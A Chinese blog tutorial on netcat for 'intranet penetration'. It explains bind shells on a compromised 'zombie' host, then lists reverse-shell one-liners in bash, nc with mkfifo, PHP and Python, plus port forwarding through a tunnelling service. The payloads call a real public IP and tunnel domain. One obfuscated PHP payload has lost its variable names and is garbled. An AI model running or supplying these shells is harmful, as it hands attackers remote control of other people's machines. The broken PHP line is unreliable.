当前位置:网站首页>内网穿透(nc)

内网穿透(nc)

2022-06-29 12:58:00 肖萧然

内网穿透技术(nc)

Netcat常称为 nc,拥有“瑞士军刀”的美誉。

nc 小巧强悍,可以读写TCP或UDP网络连接,它被设计成一个可靠的后端工具,
能被其它的程序或脚本直接驱动。同时,它又是一个功能丰富的网络调试和开发工具
,因为它可以建立你可能用到的几乎任何类型的连接,以及一些非常有意思的内建功能,
它基于socket协议工作。在渗透测试领域,我们通常利用它来反弹shell

聊天

通过一边监听端口,一边发送消息去该端口,形成一个简易版本的服务端—客户端模型。

  • 服务器端:
nc   -lvp    8888       

监听8888端口 -l 监听 -v 显示详细信息 -p 指定端口

  • 客户端:
nc  -nv  192.168.100.140  8888    

连接到服务器的8888端口 -n指定数字的IP地址 -v显示详细信息

在这里插入图片描述

文件传输

  • 服务器端:
nc  -lvp  8888 < test.txt

监听8888端口 -l 监听 -v 显示详细信息 -p 指定端口

  • 客户端:
 nc -nvz 192.168.100.140 8888 > 1.txt  

连接到服务器的8888端口 -n指定数字的IP地址 -v显示详细信息 -z 将输入输出关掉

在这里插入图片描述

正向连接

肉鸡

nc -lvvp 8888 -te cmd.exe
nc -lvvp 8888 -te /bin/bash

肉鸡监听8888端口 -l 监听 -vv 显示更详细信息 -p 指定端口 -t 使用交互方式 -e 程序重定向,一旦连接,就执行

主机

nc  -nvv  192.168.10.14  8888

主机连接到肉鸡的8888端口 -n指定数字的IP地址 -vv显示更详细信息

在这里插入图片描述

在这里插入图片描述

反向连接

当肉鸡处于内网当中,需要主机有一个公网ip,然后让肉鸡主动连接主机,就算肉鸡是公网ip,但一般都是有防火墙拦截,所以反向连接是很好的选择

肉鸡

 nc  -te /bin/bah 19.16.10.14  8888

主机

nc  -lvp  8888

端口映射(花生壳,natapp)

这里就仅使用花生壳做例子…

建立一个tcp的映射

在这里插入图片描述

实验环境

肉鸡: 192.168.100.133

本地主机: n4221p5430.wicp.vip(103.46.128.49):25741 -> 127.0.0.1:5555

本地主机中执行:

 nc  -lvp  5555

肉鸡中执行:

各种payload生成网站

https://s.xiaoxiaoran.top/
 echo 'bash -i >& /dev/tcp/103.46.128.49/25741 0>&1' | bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 103.46.128.49 25741 >/tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc  n4221p5430.wicp.vip 25741 >/tmp/f
php -r '$="1";$="2";$="3";$="4";$="5";$="6";$="7";$="8";$="9";$="0";$=" ";$="<";$=">";$="-";$="&";$🤩="i";$=".";$🤨="/";$🥰="a";$="b";$="i";$="h";$="c";$="d";$="e";$="f";$="k";$="n";$="o";$="p";$="s";$="x";$ = $. $. $. $. $. $. $. $. $;$ = "103.46.128.49";$ = 25741;$ = "sh". $. $. $🤩. $. $. $. $. $. $. $. $. $. $. $. $. $;$ = $($,$);$ = $. $. $. $;$($);'
php -r '$sock=fsockopen("103.46.128.49",25741);exec("sh <&3 >&3 2>&3");'
php -r '$sock=fsockopen("103.46.128.49",25741);passthru("sh <&3 >&3 2>&3");'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("n4221p5430.wicp.vip",25741));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

原网站

版权声明
本文为[肖萧然]所创,转载请带上原文链接,感谢
https://blog.csdn.net/qq_52549196/article/details/125509276